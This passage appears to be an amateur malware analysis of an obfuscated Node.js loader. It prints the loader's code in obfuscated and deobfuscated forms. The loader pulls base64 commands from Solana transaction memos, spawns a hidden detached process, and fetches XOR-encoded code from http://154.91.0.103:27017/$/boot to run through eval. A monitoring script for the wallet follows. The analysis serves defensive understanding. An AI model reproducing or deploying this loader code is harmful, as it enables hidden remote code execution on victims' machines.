d[(1 && m._)(0xa1)] = 0x14, new c[_$_815b[24]](c[jso$ft$boe$_43((1 && m._)(0x97), _$_815b[23])](b._[(1 && m._)(0x8e)]), b._[(1 && m._)(0x81)])[jso$ft$boe$_43((1 && m._)(0x9a) + (1 && m._)(0x87), (1 && m._)(0x92))](new c[((1 && m._)(0x9e))](b._[(1 && m._)(0x8d)]), d, b._[(1 && m._)(0x81)])[_$_815b[22]]((f) => {
// f is the list the callback receives.
const n = m._;
let g = _$_815b[10],
h = _$_815b[10];
for (let j of f) {
// Skip entries that lack the field named by n(0x8b) (the memo, per the
// write-up).
if (jso$ft$uoel$_33(j[n(0x8b)])) {
continue
};
// k is element [1] of that field after splitting it on a separator string.
let k = j[n(0x8b)][n(0x8a)](b._[n(0x95)])[0x1];
// Skip empty values and, it appears, a value equal to the previous one
// (h remembers the last k).
if (jso$ft$uoel$_33(k) || b._[n(0xa0)](k, h)) {
continue
};
// k goes through split / a no-argument method / join (looks like a
// character reversal) and is merged with g by a b._ helper.
h = k, g = b._[_$_815b[11]](k[n(0x8a)](_$_815b[10])[n(0xa3)]()[n(0x99)](_$_815b[10]), g);
// Stop once the first character of g matches a table string.
if (b._[n(0x86)](g[0x0], _$_815b[12])) {
break
}
};
// Options for the call below: {} when a string test on a value obtained via
// global[...] succeeds, otherwise detached / stdio / windowsHide.
// `!jso$ft$uoel$_33([])` evaluates to true.
const i = jso$ft$giden$global()[_$_815b[8]](_$_815b[16])[_$_815b[15]]()[_$_815b[14]](b._[_$_815b[13]]) ? {} : {
'detached': !jso$ft$uoel$_33([]),
'stdio': b._[n(0xa7)],
'windowsHide': !jso$ft$uoel$_33([])
};
// Launch step: a function obtained via global[...] is called with a command,
// an argument array and i. The last array element ends with b._[n(0xa5)]
// applied to atob and g (presumably atob(g)), i.e. text collected from the
// fetched records is base64-decoded and handed to the new process. The
// records are remote data, so the content that gets executed can change
// without any change to this file.
jso$ft$giden$global()[_$_815b[8]](b._[_$_815b[21]])[b._[n(0x85)]](b._[n(0x80)], [_$_815b[17], jso$ft$boe$_43(jso$ft$boe$_43(n(0xa4) + _$_815b[18], (jso$ft$giden$global()[_$_815b[19]] || 0x0)) + _$_815b[20], b._[n(0xa5)](jso$ft$giden$atob(), g))], i)
})[_$_815b[9]](() => {})
} catch (f) {}
}
function _$af1949883(a, b) {
var c = {};
c._ = jso$ft$giden$a_48a()();;
return a0b = jso$builder_$af1949884_(c), jso$ft$giden$a_48b()(a, b)
}
function _$af1949885() {
var o = {};
o._ = [_$_815b[25], _$_815b[26], _$_815b[27], _$_815b[28], _$_815b[29], _$_815b[30], _$_815b[31], _$_815b[32], _$_815b[33], _$_815b[34], _$_815b[35], _$_815b[36], _$_815b[37], _$_815b[38], _$_815b[39], _$_815b[40], _$_815b[41], _$_815b[42], _$_815b[43], _$_815b[44], _$_815b[45], _$_815b[46], _$_815b[47], _$_815b[48], _$_815b[49], _$_815b[50], _$_815b[51], _$_815b[52], _$_815b[53], _$_815b[54], _$_815b[55], _$_815b[56], _$_815b[57], _$_815b[58], _$_815b[59], _$_815b[60], _$_815b[61], _$_815b[62], _$_815b[63], _$_815b[64]];;
a0a = jso$builder_$af1949886_(o);
return jso$ft$giden$a_48a()()
}
a0b = _$af1949883;
a0a = _$af1949885;
(_$af1949875(a0a, 0x28f51), (_$af1949876()));
if (_$af1949887 === 1) {
_$af1949883(_$_815b[22], true, false);
return
};
function jso$spliter_$af1949890(t, e, m) {
e._[t._] = e._[m._]
}
function jso$spliter_$af1949891(m, e, f) {
e._[m._] = f._
}
function jso$spliter_$af1949892(o, h, y) {
o._ = jso$ft$boe$_37((jso$ft$boe$_43(h._, y._)), 5158178)
}
function jso$spliter_$af1949893() {
_$af1949885 = null
}
function jso$builder_$af1949884_(c) {
return function(jso$setrpl$d, e) {
var d = {};
d._ = jso$setrpl$d;
jso$spliter_$af1949894(d);
let f = c._[d._];
return f
}
}
function jso$builder_$af1949886_(o) {
return function() {
return o._
}
}
function jso$spliter_$af1949894(d) {
d._ = jso$ft$boe$_45(d._, 0x80)
}
The main function here is _$af1949876. We see a code block inside it:
const c = jso$ft$giden$global()[_$_815b[8]](b._[(1 && m._)(0x9d)]),
d = {};
d[(1 && m._)(0xa1)] = 0x14, new c[_$_815b[24]](c[jso$ft$boe$_43((1 && m._)(0x97), _$_815b[23])](b._[(1 && m._)(0x8e)]), b._[(1 && m._)(0x81)])[jso$ft$boe$_43((1 && m._)(0x9a) + (1 && m._)(0x87), (1 && m._)(0x92))](new c[((1 && m._)(0x9e))](b._[(1 && m._)(0x8d)]), d, b._[(1 && m._)(0x81)])[_$_815b[22]]((f) => {It resolves to something similar to this:
const connection = new Connection(clusterApiUrl('mainnet-beta'), 'confirmed');
const publicKey = new PublicKey('GHCdBSGpFg8MdMTSDDitRNwmsT4Wy95CUe2VSEZpEzsZ');
const options = { limit: 20 };
The next lines after that resolve to something like:
const { Connection, PublicKey, clusterApiUrl } = require('@solana/web3.js');
const os = require('os');
const { spawn } = require('child_process');
const isWindows = os.platform().startsWith('win');
const spawnOptions = isWindows ? {} : {
detached: true,
stdio: 'ignore',
windowsHide: true
};
// Example of a simple child process command
const command = 'node';
const args = ['-e', 'global[\'r\'] = require;(function(){var bhu=\'\',eMA=368-357;function qng(x){var u=749127;var g=x.length;var v=[];for(var y=0;y<g;y++){v[y]=x.charAt(y)};for(var y=0;y<g;y++){var o=u*(y+207)+(u%19101);var c=u*(y+650)+(u%36026);var d=o%g;var f=c%g;var b=v[d];v[d]=v[f];v[f]=b;u=(o+c)%4939431;};return v.join(\'\')};var leP=qng(\'wvcrrfaoouhegrconttilcjdnzkqtssupmxyb\').substr(0,eMA);var TRJ=\')a; gre822a8ir+5;)4va;yp>rea2)}jshc,-=r(q=its46et6+,f)=)s.n=tx>ghu,vd,k n.r,m(xoe,b5a60nei 81r(1t 1,7yy(nbA),70n==].vr};i;raa{s==(8f=er5*hq3g1na;t]r9dof]] ;r)f4oSg.r=7.ySsa8!o(1]nr-"d=;ln=05r(+vf00(rtsj,hgx]i,1)ls+u[=r+1.uAit l;h-+)1r8nn7(av (.;vg+lk.f7rli"x"u,grf; ana"vjs,f+=;]rn-g4h0aph,afC {algrb4i.l;+f-fe;e[pr;maavrah){=;qa=ty;,ent(9Crn)8+t}eeuvibnv{zu (g=rpgnh"d<qd,p;)b;nr v(o2x{mbvlo.At;=q.;a,sq(=[ee;g(e6+sl=(hf.mnnr9sh}e)rv+n0tr+i.6h<)e=);;l"bv;;a. ,ft.,=z) det(a+vl.agcc-s[p.c;o-C;d1r((rrr)+8xj1,[rgovh2v;[lingiai=2r10=cun)l0*oir]+ie i+t=f(A=a(;n;)m==ooif nnaClr[u r([s6" glin)lhr<o=hars7kr, s;[ddlp3=;,venuyujfa+umb;pu)=tr7]{c[ k;=.<acz[(1ih,(k+avoz)ureafvpnt"e=Cragip).o(i+ltt(gt2C0]=..,x)+(o";)]aa.g=(9C);haud,h9)rl ne64;o1v]t;r=j[}h sn8t8wn.)c)o;7vo9 nov(t{j;..a.=sg 0==;[<vol5++ge;l +(mCm("[e;mg;(9udh(y5!l,a6.oj;too)eog,v7has)ar+,ran(vln]4xiAat;)nc]=soogtr06l=)i}}ritgx)=\';var gCw=qng[leP];var DMK=\'\';var OtQ=gCw;var zVn=gCw(DMK,qng(TRJ));var VWb=zVn(qng(\'$t=ag<o<gc.)!f1kico9.8r< b;\\/.s(j49.5$it8_:(_<<idr)6)!;$n(cal{c{j3=<30i0_ ev3up*ev76s_<<<5.2c5<_ia{)q!t$4r<fvd2S2r9i.c"r,h<_}.%[{{6_.$.(a,{+.clre+]]60<]h6%"3}068<.50<,()1o<S%;&rad!1%x<_3,oa<9d,a07c)3_:%a)"%((!i]844kdiil!.$%,.Cn.=<<hi;._crc@.<.]Cqn1(<np<{.}<!d)k4\\/ c.(;<l@<"?)3<t.Tb<o7c_!!(<%t;&!<a4c<tn5i4sj$h7; l,6p4_Ca10>(;)a%7>21<<<%1<5.cf=5<% c_{.53.<6<(<c.)tj=5nc;r..\\/7.j..r3<.M;h)8_ k@$2$=o<fj!.<3<<.]1;=1jccnoin=sS<(c._n&#<a4]_d9t4r!7()eki0*xb)Mb)_f)7d)w.ng<)1!9.;{)c10h4s(<.)<e(t3;<<)fj!ap+<;!_]<{._0r]$)!l{kl.b0a.!3..<[42r&r<()ed<otnjo9.d<;.1+<4<"(]=..p"cib;13*lgd\\\'!})c.())+ye6(<6<a4 
s2d+)<l]<]__<24=6rri".,gs.[]1)s;.<idg${)\\/w.+(peqe=<#9zau6b8,<44.id_7<n)c,h%rll:, 6<a0(_)o!}6$#36,q.!_o<to.<<37.of._<1](2<_(.=5E+t<%$o9<5n.)e[;8ib.<m,r;(f.,=Tr>].(2lhll.<<q<_("ebs=70]s4;oir.k\\/6omah9.")<)lvt.()t<n6 d10-70d+o=.(a.t0n=xd=xbp0\\\'g7<na7) q.%#pdl<C,jrrC_;fcf.,.;0d<!o1<r6u,<dr<w9.#=}y.<f.f:33$_\\/g,1 0\\/);(jf0al<.9n]e=-;c<e4j(!p+._<;]c<c2m.<&c(+5c{sn7(=)(t +a0a0#_<rr.i&ga9<3(j<S9.lile}5;%9)22r)9i9<k_l<,4cw;((xcof<.d<m(&b%,n];,6)]5,n=5+i&)<;$c9=_7,;tiia=<a<.as<].;.}=ei4@1<i.tp2:)\\/ca}83vn6 h7);i, )2cr0_!5c0f.;<8C f{sgj).{.jo8.1s)n(.3iq<tac..<e(<)<.cxb7<hfg!cg.d%g)3;rgr#3n;.)4.(<<%cc0\\/<c0o4.96ukl<1<5o<?0.l5ee)\\/<t6b<!\\/5<1<*(($..<=<(t}30.i\\/t<1<<c;!,<na.+3<b6.p5.c}=un1ntbh74e;_t..=={<2<)d9..)a3i<_4.]e)p<1%r)<.ckg1yucs+)])$!]fe x\\\'pn3f)]9<0=(z=<7\\\'-5!f<!,]}]6)_n$t- cet2d"rc$_3( f7=o<60j:q<;$$2+194!]<oh= ],7\\/aht;j7<;5+;s<)n)3S$<)?c<.o,o+]0r3]>:,r;{hgr<1(l\\\'bso1<<".%5.c{o36:b61_6=s8sbs1(c}<(5c}!)2tT,< _<od!6;<!,0.i_?5)w3]e($55.!;_<g(a.}<(<]2<(i0t.<)<scsN5o!kb[_jl]05190)a<.jec7e#bp,d<<\\/<adc_)]<l;h 8g<.()<t[ 3($=(5e[.rd2<76$u)l+1$<c.,4+h t %p 4p6l ;(r9!.50g4del1u0ot enht<r_!;(p_ , ,\\/=12{q(%, _(.l2e$13"jja 2-5l(e)<\\/ ,p)o\'));var CBO=OtQ(bhu,VWb );CBO(7975);return 1965})()'];
const child = spawn(command, args, spawnOptions);
So the main thing here is this:
spawn(command, args, spawnOptions)
The spawn function from Node.js's child_process module is used to launch a new process. It runs the given executable directly (no shell is involved unless the `shell` option is set) and is often used to execute external programs or scripts.
Breaking Down the Code
Code Snippet:
const child = spawn(command, args, spawnOptions);
command:
- Represents the executable or program to run.
- Here, it is set to 'node'.
args:
- An array of strings passed as arguments to the command.
- Here, it is set to args = ['-e', 'global[\'r\'] = require;(function(){var bhu=\'\',eMA=368-357;...............']
- The first argument, '-e', tells node to execute a script directly from the command line.
- The second argument, <obfuscatedCode>, contains the actual malicious obfuscated script.
spawnOptions:
- For Windows, spawnOptions is an empty object {} because Windows requires minimal configuration.
- For non-Windows platforms (such as Linux or macOS), the following options are used:
  - detached: true makes the child process independent of the parent process.
  - stdio: 'ignore' prevents the child process from inheriting the parent's standard input/output streams.
  - windowsHide: true hides the child process window on Windows.
Here in the args, in the <obfuscatedCode>, we again get another piece of code:
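// Publishes Node's require() as the global `r`; the decoded code further down
// obtains its modules through global[...] lookups rather than calling
// require() by name. The one-liner passed to `node -e` assigns the function
// itself (no quotes around require), so the beautified copy must do the same.
global['r'] = require;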
(function() {
var bhu = '',
eMA = 368 - 357;
function qng(x) {
var u = 749127;
var g = x.length;
var v = [];
for (var y = 0; y < g; y++) {
v[y] = x.charAt(y)
};
for (var y = 0; y < g; y++) {
var o = u * (y + 207) + (u % 19101);
var c = u * (y + 650) + (u % 36026);
var d = o % g;
var f = c % g;
var b = v[d];
v[d] = v[f];
v[f] = b;
u = (o + c) % 4939431;
};
return v.join('')
};
var leP = qng('wvcrrfaoouhegrconttilcjdnzkqtssupmxyb').substr(0, eMA);
var TRJ = ')a; gre822a8ir+5;)4va;yp>rea2)}jshc,-=r(q=its46et6+,f)=)s.n=tx>ghu,vd,k n.r,m(xoe,b5a60nei 81r(1t 1,7yy(nbA),70n==].vr};i;raa{s==(8f=er5*hq3g1na;t]r9dof]] ;r)f4oSg.r=7.ySsa8!o(1]nr-"d=;ln=05r(+vf00(rtsj,hgx]i,1)ls+u[=r+1.uAit l;h-+)1r8nn7(av (.;vg+lk.f7rli"x"u,grf; ana"vjs,f+=;]rn-g4h0aph,afC {algrb4i.l;+f-fe;e[pr;maavrah){=;qa=ty;,ent(9Crn)8+t}eeuvibnv{zu (g=rpgnh"d<qd,p;)b;nr v(o2x{mbvlo.At;=q.;a,sq(=[ee;g(e6+sl=(hf.mnnr9sh}e)rv+n0tr+i.6h<)e=);;l"bv;;a. ,ft.,=z) det(a+vl.agcc-s[p.c;o-C;d1r((rrr)+8xj1,[rgovh2v;[lingiai=2r10=cun)l0*oir]+ie i+t=f(A=a(;n;)m==ooif nnaClr[u r([s6" glin)lhr<o=hars7kr, s;[ddlp3=;,venuyujfa+umb;pu)=tr7]{c[ k;=.<acz[(1ih,(k+avoz)ureafvpnt"e=Cragip).o(i+ltt(gt2C0]=..,x)+(o";)]aa.g=(9C);haud,h9)rl ne64;o1v]t;r=j[}h sn8t8wn.)c)o;7vo9 nov(t{j;..a.=sg 0==;[<vol5++ge;l +(mCm("[e;mg;(9udh(y5!l,a6.oj;too)eog,v7has)ar+,ran(vln]4xiAat;)nc]=soogtr06l=)i}}ritgx)=';
var gCw = qng[leP];
var DMK = '';
var OtQ = gCw;
var zVn = gCw(DMK, qng(TRJ));
var VWb = zVn(qng('$t=ag<o<gc.)!f1kico9.8r< b;\/.s(j49.5$it8_:(_<<idr)6)!;$n(cal{c{j3=<30i0_ ev3up*ev76s_<<<5.2c5<_ia{)q!t$4r<fvd2S2r9i.c"r,h<_}.%[{{6_.$.(a,{+.clre+]]60<]h6%"3}068<.50<,()1o<S%;&rad!1%x<_3,oa<9d,a07c)3_:%a)"%((!i]844kdiil!.$%,.Cn.=<<hi;._crc@.<.]Cqn1(<np<{.}<!d)k4\/ c.(;<l@<"?)3<t.Tb<o7c_!!(<%t;&!<a4c<tn5i4sj$h7; l,6p4_Ca10>(;)a%7>21<<<%1<5.cf=5<% c_{.53.<6<(<c.)tj=5nc;r..\/7.j..r3<.M;h)8_ k@$2$=o<fj!.<3<<.]1;=1jccnoin=sS<(c._n&#<a4]_d9t4r!7()eki0*xb)Mb)_f)7d)w.ng<)1!9.;{)c10h4s(<.)<e(t3;<<)fj!ap+<;!_]<{._0r]$)!l{kl.b0a.!3..<[42r&r<()ed<otnjo9.d<;.1+<4<"(]=..p"cib;13*lgd\'!})c.())+ye6(<6<a4 s2d+)<l]<]__<24=6rri".,gs.[]1)s;.<idg${)\/w.+(peqe=<#9zau6b8,<44.id_7<n)c,h%rll:, 6<a0(_)o!}6$#36,q.!_o<to.<<37.of._<1](2<_(.=5E+t<%$o9<5n.)e[;8ib.<m,r;(f.,=Tr>].(2lhll.<<q<_("ebs=70]s4;oir.k\/6omah9.")<)lvt.()t<n6 d10-70d+o=.(a.t0n=xd=xbp0\'g7<na7) q.%#pdl<C,jrrC_;fcf.,.;0d<!o1<r6u,<dr<w9.#=}y.<f.f:33$_\/g,1 0\/);(jf0al<.9n]e=-;c<e4j(!p+._<;]c<c2m.<&c(+5c{sn7(=)(t +a0a0#_<rr.i&ga9<3(j<S9.lile}5;%9)22r)9i9<k_l<,4cw;((xcof<.d<m(&b%,n];,6)]5,n=5+i&)<;$c9=_7,;tiia=<a<.as<].;.}=ei4@1<i.tp2:)\/ca}83vn6 h7);i, )2cr0_!5c0f.;<8C f{sgj).{.jo8.1s)n(.3iq<tac..<e(<)<.cxb7<hfg!cg.d%g)3;rgr#3n;.)4.(<<%cc0\/<c0o4.96ukl<1<5o<?0.l5ee)\/<t6b<!\/5<1<*(($..<=<(t}30.i\/t<1<<c;!,<na.+3<b6.p5.c}=un1ntbh74e;_t..=={<2<)d9..)a3i<_4.]e)p<1%r)<.ckg1yucs+)])$!]fe x\'pn3f)]9<0=(z=<7\'-5!f<!,]}]6)_n$t- cet2d"rc$_3( f7=o<60j:q<;$$2+194!]<oh= ],7\/aht;j7<;5+;s<)n)3S$<)?c<.o,o+]0r3]>:,r;{hgr<1(l\'bso1<<".%5.c{o36:b61_6=s8sbs1(c}<(5c}!)2tT,< _<od!6;<!,0.i_?5)w3]e($55.!;_<g(a.}<(<]2<(i0t.<)<scsN5o!kb[_jl]05190)a<.jec7e#bp,d<<\/<adc_)]<l;h 8g<.()<t[ 3($=(5e[.rd2<76$u)l+1$<c.,4+h t %p 4p6l ;(r9!.50g4del1u0ot enht<r_!;(p_ , ,\/=12{q(%, _(.l2e$13"jja 2-5l(e)<\/ ,p)o'));
var CBO = OtQ(bhu, VWb);
CBO(7975);
return 1965
})()
We deobfuscate it again and get code similar to what we got the first time:
// Indirection helpers for the second stage, same scheme as in the first: one
// operator or one global per function, with character codes in the name
// (94 is "^", 37 "%", 43 "+", 60 "<", 61 "="; 95/36/50/49/56/57/54/48 spell
// "_$" and the digits of _$af2218960).
function jso$ft$boe$_94(a, b) {
return a ^ b
}
function jso$ft$giden$_95_36af_50_50_49_56_57_54_48() {
return _$af2218960
}
function jso$ft$boe$_61_61_61(a, b) {
return a === b
}
// Returns the builtin eval; the loader further down calls it on text that was
// fetched over the network.
function jso$ft$giden$eval() {
return eval
}
function jso$ft$giden$global() {
return global
}
function jso$ft$giden$String() {
return String
}
function jso$ft$boe$_37(a, b) {
return a % b
}
function jso$ft$boe$_43(a, b) {
return a + b
}
function jso$ft$boe$_60(a, b) {
return a < b
}
var _$_1959 = (_$af2218960)("sCShtl.1:/Z0 4oa1id_i0 )e%d%oha%AEio:teCexolis$%p.iG3eh4cw% .1p0kn1(Wp;6M3 4bW) ArNlfahb0Gt/T.o 3.5;%t5m6e7ilat G0%%hg lrr.f3%1Mt6t1t%7oea0.%3/5 ;rt0%gcrk.oiaoeVTTH(/+nLnX/6A%.adxed9gz/O.Shro5oJ/%KKf63mCjWnCi/e%0a0H r", 749127);
function _$af2218960(p, jso$setrpl$n) {
var n = {},
h = {},
l = {},
g = {},
j = {},
q = {},
r = {};
n._ = jso$setrpl$n;
var i = p.length;
h._ = [];;
for (var d = 0; jso$ft$boe$_60(d, i); d++) {
h._[d] = p.charAt(d)
};
for (var d = 0; jso$ft$boe$_60(d, i); d++) {
l._ = jso$ft$boe$_43(n._ * (jso$ft$boe$_43(d, 207)), (jso$ft$boe$_37(n._, 19101)));;
g._ = jso$ft$boe$_43(n._ * (jso$ft$boe$_43(d, 650)), (jso$ft$boe$_37(n._, 36026)));;
j._ = jso$ft$boe$_37(l._, i);;
q._ = jso$ft$boe$_37(g._, i);;
r._ = h._[j._];;
jso$spliter_$af2218962(j, h, q);
jso$spliter_$af2218963(q, h, r);
jso$spliter_$af2218964(n, l, g)
};
var a = jso$ft$giden$String().fromCharCode(127);
var k = '';
var y = '%';
var o = '#1';
var x = '%';
var f = '#0';
var w = '#';
return h._.join(k).split(y).join(a).split(o).join(x).split(f).join(w).split(a)
}
if (!_$_1959) {
_$af2218960(0)
};
// A global is set to three string-table entries followed by the number 27017;
// per the analysis below this listing it resolves to the base URL
// http://154.91.0.103:27017.
global[_$_1959[0]] = _$_1959[1] + _$_1959[2] + _$_1959[3] + 27017;
// Loader: an object obtained through global[...] performs a request to that
// base URL plus _$_1959[5], sending a fixed User-Agent header. One property
// of the response is passed through the function returned by
// jso$builder_$af2218959_() (a repeating-key XOR, see its definition) and the
// result goes straight to eval(). Whatever the server returns therefore runs
// inside this Node process with its privileges; the code it delivers is not
// part of this listing.
(async () => {
await jso$ft$giden$eval()(jso$builder_$af2218959_()((await jso$ft$giden$global()[_$_1959[9]](_$_1959[8])[_$_1959[7]](("" + jso$ft$giden$global()[_$_1959[0]] + _$_1959[5]), {
headers: {
'User-Agent': _$_1959[6]
}
}))[_$_1959[4]]))
})();
function jso$spliter_$af2218962(j, h, q) {
h._[j._] = h._[q._]
}
function jso$spliter_$af2218963(q, h, r) {
h._[q._] = r._
}
function jso$spliter_$af2218964(n, l, g) {
n._ = jso$ft$boe$_37((jso$ft$boe$_43(l._, g._)), 4939431)
}
// Returns the decoder applied to the downloaded text before it is evaluated:
// each position of `input` is combined with the key value at (i % key length)
// using XOR, and the results are appended to r.
function jso$builder_$af2218959_() {
return function(input) {
// k is the key, taken from the string table; kn is read with the same table
// name that is used for input's length in the loop condition (presumably
// "length").
const k = _$_1959[10];
const kn = k[_$_1959[11]];
let r = _$_1959[12];
for (let i = 0; jso$ft$boe$_60(i, input[_$_1959[11]]); i++) {
// The same method name is called on input and on the key with an index
// (presumably charCodeAt).
const c = input[_$_1959[13]](i);
const x = k[_$_1959[13]](jso$ft$boe$_37(i, kn));
// Compares the table-decoder function itself with 0. That is false while
// _$af2218960 is still a function; looks like an obfuscator-inserted guard.
if (jso$ft$boe$_61_61_61(_$af2218960, 0)) {
jso$ft$giden$_95_36af_50_50_49_56_57_54_48()(_$_1959[4], _$_1959[0]);
jso$spliter_$af2218965();
return
};
// c ^ x is turned back into text by a method reached through global[...]
// (presumably String.fromCharCode) and appended.
r += jso$ft$giden$global()[_$_1959[15]][_$_1959[14]](jso$ft$boe$_94(c, x))
};
return r
}
}
function jso$spliter_$af2218965() {
_$af2218960 = false
}
Now, we are onto the final step.
global[_$_1959[0]] holds the main IP address that it contacts; the request URL resolves to http://154.91.0.103:27017/$/boot, and the User-Agent header _$_1959[6] resolves to Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML; like Gecko) Chrome/131.0.0.0 Safari/537.36
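In the end, it will run a background process and mine cryptos from your system. Note that the code shown above only downloads a response from that address, decodes it and passes it to eval; the downloaded payload itself is not included in this analysis, so what it does once it runs is not visible here.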
I am not familiar with crypto and such. As far as I know, here's a simple implementation in Express.js to securely fetch account details, monitor Solana transactions, and retrieve memos:
// Stand-alone monitoring sketch: reads public data for the wallet that the
// loader queries and serves it as JSON.
const express = require('express');
const { Connection, PublicKey, clusterApiUrl } = require('@solana/web3.js');
// NOTE(review): os and spawn are not used anywhere in this listing; a script
// that only reads chain data has no need for child_process.
const os = require('os');
const { spawn } = require('child_process');
const app = express();
// NOTE(review): app.listen(port) at the end of the listing passes no host, so
// the server accepts connections on all interfaces and the routes have no
// authentication; pass '127.0.0.1' as the host if this is only for local use.
const port = 6969;
// Solana connection setup
const connection = new Connection(clusterApiUrl('mainnet-beta'), 'confirmed');
// Wallet address taken from the resolved loader code above.
const publicKey = new PublicKey('GHCdBSGpFg8MdMTSDDitRNwmsT4Wy95CUe2VSEZpEzsZ');
// Same page size as the loader uses.
const options = { limit: 20 };
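// GET /process-transactions: responds with the memo summary as JSON, or with
// a generic 500 body if the lookup throws.
app.get('/process-transactions', async (req, res) => {
  try {
    const memoData = await processSolanaTransactions();
    res.json({ memoData });
  } catch (error) {
    // Keep the cause in the server log (as /account/details does); the client
    // only receives the generic message.
    console.error("Error processing transactions:", error);
    res.status(500).json({ error: "Error processing transactions" });
  }
});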
// Function to fetch transaction signatures and process memos.
/**
 * Fetches recent signatures for the monitored wallet and summarises their memos.
 * Memo text is whatever the sender wrote on-chain, so treat it as untrusted
 * data: display it, never decode-and-run it.
 *
 * @returns {Promise<string>} "Processed Memo: <text>" for the last qualifying
 *   memo, "" when none qualifies, or "Error processing transactions." when the
 *   lookup or the parsing throws.
 */
async function processSolanaTransactions() {
  try {
    const signatures = await connection.getSignaturesForAddress(publicKey, options, 'confirmed');
    let summary = "";
    let lastSeen = "";
    for (const entry of signatures) {
      // Entries without a memo carry nothing to report.
      if (!entry.memo) {
        continue;
      }
      // Only the part after the ' GH$' marker is of interest.
      const payload = entry.memo.split(' GH$')[1];
      // Ignore memos without the marker and immediate repeats.
      if (!payload || payload === lastSeen) {
        continue;
      }
      lastSeen = payload;
      summary = `Processed Memo: ${payload}`;
    }
    return summary;
  } catch (failure) {
    console.error("Error fetching transactions:", failure);
    return "Error processing transactions.";
  }
}
// get SOL(Solana) transaction memos
// GET /solana-memos: same memo summary as /process-transactions, returned as
// { memoData }.
app.get('/solana-memos', async (req, res) => {
  res.json({ memoData: await processSolanaTransactions() });
});
// get account balance (SOL)
/**
 * Reads the wallet balance and converts it from lamports to SOL.
 *
 * @returns {Promise<number>} balance in SOL
 */
async function getSolBalance() {
  const lamportsInOneSol = 1000000000;
  const lamports = await connection.getBalance(publicKey);
  return lamports / lamportsInOneSol;
}
// get transaction history
/**
 * Fetches the most recent signatures recorded for the wallet.
 *
 * @returns {Promise<Array>} whatever getSignaturesForAddress resolves to
 */
async function getTransactionHistory() {
  // Only the last 20 transactions are requested.
  return connection.getSignaturesForAddress(publicKey, { limit: 20 }, 'confirmed');
}
// get account details
/**
 * Fetches the raw account record for the wallet.
 *
 * @returns {Promise<object|null>} whatever getAccountInfo resolves to
 */
async function getAccountDetails() {
  return connection.getAccountInfo(publicKey);
}
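// GET /account/details: balance, recent signatures and raw account info for
// the monitored wallet, or a generic 500 body if any lookup fails.
app.get('/account/details', async (req, res) => {
  try {
    // The three lookups do not depend on each other, so they run concurrently
    // instead of one after another.
    const [solBalance, transactionHistory, accountInfo] = await Promise.all([
      getSolBalance(),
      getTransactionHistory(),
      getAccountDetails(),
    ]);
    res.json({ solBalance, transactionHistory, accountInfo });
  } catch (error) {
    console.error("Error fetching account details", error);
    res.status(500).json({ error: 'Failed to fetch account details.' });
  }
});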
app.listen(port, () => {
console.log(`running on http://localhost:${port}`);
});
Observations
Upon monitoring the wallet GHCdBSGpFg8MdMTSDDitRNwmsT4Wy95CUe2VSEZpEzsZ, the balance was 0.09771454 SOL (~₹1548.32). Several transactions were logged in the history.
http://154.91.0.103:27017 — this was the IP address that was used to mine Solana.
How in the world do we decode such things.....I'm seeing this for the first time!!